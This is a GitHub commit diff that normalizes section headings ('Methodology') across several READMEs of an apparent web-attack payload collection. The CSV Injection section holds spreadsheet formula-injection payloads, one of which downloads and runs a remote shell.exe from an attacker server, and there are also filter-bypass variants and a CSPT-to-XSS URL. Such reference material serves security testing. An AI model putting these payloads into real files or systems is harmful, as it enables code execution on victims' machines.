Skip to content

Commit 2deb20a

Browse files
committed
Normalize page header for CSRF, DNS, DOS, Dependencies
1 parent d80f73a commit 2deb20a

File tree

14 files changed

+105
-96
lines changed

14 files changed

+105
-96
lines changed

Business Logic Errors/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@
55

66
## Summary
77

8-
* [Examples](#examples)
8+
* [Methodology](#methodology)
99
* [Review Feature Testing](#review-feature-testing)
1010
* [Discount Code Feature Testing](#discount-code-feature-testing)
1111
* [Delivery Fee Manipulation](#delivery-fee-manipulation)
@@ -17,7 +17,7 @@
1717
* [References](#references)
1818

1919

20-
## Examples
20+
## Methodology
2121

2222
Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
2323

CORS Misconfiguration/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@
77

88
* [Tools](#tools)
99
* [Requirements](#requirements)
10-
* [Exploitation](#exploitation)
10+
* [Methodology](#methodology)
1111
* [Origin Reflection](#origin-reflection)
1212
* [Null Origin](#null-origin)
1313
* [XSS on Trusted Origin](#xss-on-trusted-origin)
@@ -33,7 +33,7 @@
3333
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
3434

3535

36-
## Exploitation
36+
## Methodology
3737

3838
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
3939

CRLF Injection/README.md

Lines changed: 12 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -7,15 +7,18 @@
77

88
## Summary
99

10-
- [Add a cookie](#add-a-cookie)
11-
- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
12-
- [Write HTML](#write-html)
13-
- [Filter Bypass](#filter-bypass)
14-
- [Labs](#labs)
15-
- [References](#references)
10+
* [Methodology](#methodology)
11+
* [Add a cookie](#add-a-cookie)
12+
* [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
13+
* [Write HTML](#write-html)
14+
* [Filter Bypass](#filter-bypass)
15+
* [Labs](#labs)
16+
* [References](#references)
1617

1718

18-
## Add a cookie
19+
## Methodology
20+
21+
### Add a cookie
1922

2023
Requested page
2124

@@ -39,7 +42,7 @@ x-xss-protection: 1; mode=block
3942
```
4043

4144

42-
## Add a cookie - XSS Bypass
45+
### Add a cookie - XSS Bypass
4346

4447
Requested page
4548

@@ -71,7 +74,7 @@ X-XSS-Protection:0
7174
```
7275

7376

74-
## Write HTML
77+
### Write HTML
7578

7679
Requested page
7780

CSV Injection/README.md

Lines changed: 37 additions & 41 deletions
Original file line numberDiff line numberDiff line change
@@ -1,53 +1,49 @@
11
# CSV Injection
22

3-
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
3+
> Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
44
5-
## Exploit
65

7-
Basic exploits with **Dynamic Data Exchange**.
8-
9-
10-
Payload: pop a calc
11-
12-
```powershell
13-
DDE ("cmd";"/C calc";"!A0")A0
14-
@SUM(1+1)*cmd|' /C calc'!A0
15-
=2+5+cmd|' /C calc'!A0
16-
```
17-
18-
Payload: pop a notepad
19-
20-
```powershell
21-
=cmd|' /C notepad'!'A1'
22-
```
23-
24-
Payload: powershell download and execute
6+
## Summary
257

26-
```powershell
27-
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
28-
```
29-
30-
Payload: Prefix obfuscation and command chaining
8+
* [Methodology](#methodology)
9+
* [References](#references)
3110

32-
```powershell
33-
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
34-
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
35-
+thespanishinquisition(cmd|'/c calc.exe'!A
36-
= cmd|'/c calc.exe'!A
37-
```
3811

39-
Payload: Using rundll32 instead of cmd
12+
## Methodology
4013

41-
```powershell
42-
=rundll32|'URL.dll,OpenURL calc.exe'!A
43-
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
44-
```
45-
46-
Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
14+
Basic exploits with **Dynamic Data Exchange**.
4715

48-
```powershell
49-
= C m D | '/ c c al c . e x e ' ! A
50-
```
16+
* Spawn a calc
17+
```powershell
18+
DDE ("cmd";"/C calc";"!A0")A0
19+
@SUM(1+1)*cmd|' /C calc'!A0
20+
=2+5+cmd|' /C calc'!A0
21+
=cmd|' /C calc'!'A1'
22+
```
23+
24+
* PowerShell download and execute
25+
```powershell
26+
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
27+
```
28+
29+
* Prefix obfuscation and command chaining
30+
```powershell
31+
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
32+
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
33+
+thespanishinquisition(cmd|'/c calc.exe'!A
34+
= cmd|'/c calc.exe'!A
35+
```
36+
37+
* Using rundll32 instead of cmd
38+
```powershell
39+
=rundll32|'URL.dll,OpenURL calc.exe'!A
40+
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
41+
```
42+
43+
* Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
44+
```powershell
45+
= C m D | '/ c c al c . e x e ' ! A
46+
```
5147
5248
Technical details of the above payloads:
5349

CVE Exploits/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# Common Vulnerabilities and Exposures
22

3-
A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
3+
> A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
44
55
## Summary
66

Clickjacking/README.md

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -24,9 +24,10 @@
2424

2525
## Tools
2626

27-
* [Burp Suite](https://portswigger.net/burp)
28-
* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
29-
* [Clickjack](https://github.com/machine1337/clickjack)
27+
* [portswigger/burp](https://portswigger.net/burp)
28+
* [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy)
29+
* [machine1337/clickjack](https://github.com/machine1337/clickjack)
30+
3031

3132
## Methodology
3233

Client Side Path Traversal/README.md

Lines changed: 7 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -10,8 +10,9 @@
1010
## Summary
1111

1212
* [Tools](#tools)
13-
* [CSPT to XSS](#cspt-to-xss)
14-
* [CSPT to CSRF](#cspt-to-xss)
13+
* [Methodology](#methodology)
14+
* [CSPT to XSS](#cspt-to-xss)
15+
* [CSPT to CSRF](#cspt-to-xss)
1516
* [Labs](#labs)
1617
* [References](#references)
1718

@@ -21,7 +22,9 @@
2122
* [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
2223

2324

24-
## CSPT to XSS
25+
## Methodology
26+
27+
### CSPT to XSS
2528

2629
![](https://matanber.com/images/blog/cspt-query-param.png)
2730

@@ -35,7 +38,7 @@ A post-serving page calls the fetch function, sending a request to a URL with at
3538
* Final payload is `https://example.com/static/cms/news.html?newsitemid=../pricing/default.js?cb=alert(document.domain)//`
3639

3740

38-
## CSPT to CSRF
41+
### CSPT to CSRF
3942

4043
A CSPT is redirecting legitimate HTTP requests, allowing the front end to add necessary tokens for API calls, such as authentication or CSRF tokens. This capability can potentially be exploited to circumvent existing CSRF protection measures.
4144

Command Injection/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
## Summary
77

88
* [Tools](#tools)
9-
* [Exploits](#exploits)
9+
* [Methodology](#methodology)
1010
* [Basic commands](#basic-commands)
1111
* [Chaining commands](#chaining-commands)
1212
* [Argument injection](#argument-injection)
@@ -46,7 +46,7 @@
4646
* [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
4747

4848

49-
## Exploits
49+
## Methodology
5050

5151
Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
5252

Cross-Site Request Forgery/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@
99
* [Methodology](#methodology)
1010
* [Payloads](#payloads)
1111
* [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
12-
* [HTML GET - No User Interaction)](#html-get---no-user-interaction)
12+
* [HTML GET - No User Interaction](#html-get---no-user-interaction)
1313
* [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
1414
* [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
1515
* [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
@@ -22,7 +22,7 @@
2222

2323
## Tools
2424

25-
* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
25+
* [0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.
2626

2727

2828
## Methodology

DNS Rebinding/README.md

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@
55
## Summary
66

77
* [Tools](#tools)
8-
* [Exploitation](#exploitation)
8+
* [Methodology](#methodology)
99
* [Protection Bypasses](#protection-bypasses)
1010
* [0.0.0.0](#0000)
1111
* [CNAME](#CNAME)
@@ -15,11 +15,11 @@
1515

1616
## Tools
1717

18-
- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks.
19-
- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack)
18+
- [nccgroup/singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework.
19+
- [rebind.it](http://rebind.it/) - Singularity of Origin Web Client.
2020

2121

22-
## Exploitation
22+
## Methodology
2323

2424
First, we need to make sure that the targeted service is vulnerable to DNS rebinding.
2525
It can be done with a simple curl request:
@@ -75,6 +75,7 @@ $ dig www.example.com +noall +answer
7575
localhost.example.com. 381 IN CNAME localhost.
7676
```
7777
78+
7879
## References
7980
8081
- [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)

0 commit comments

Comments
 (0)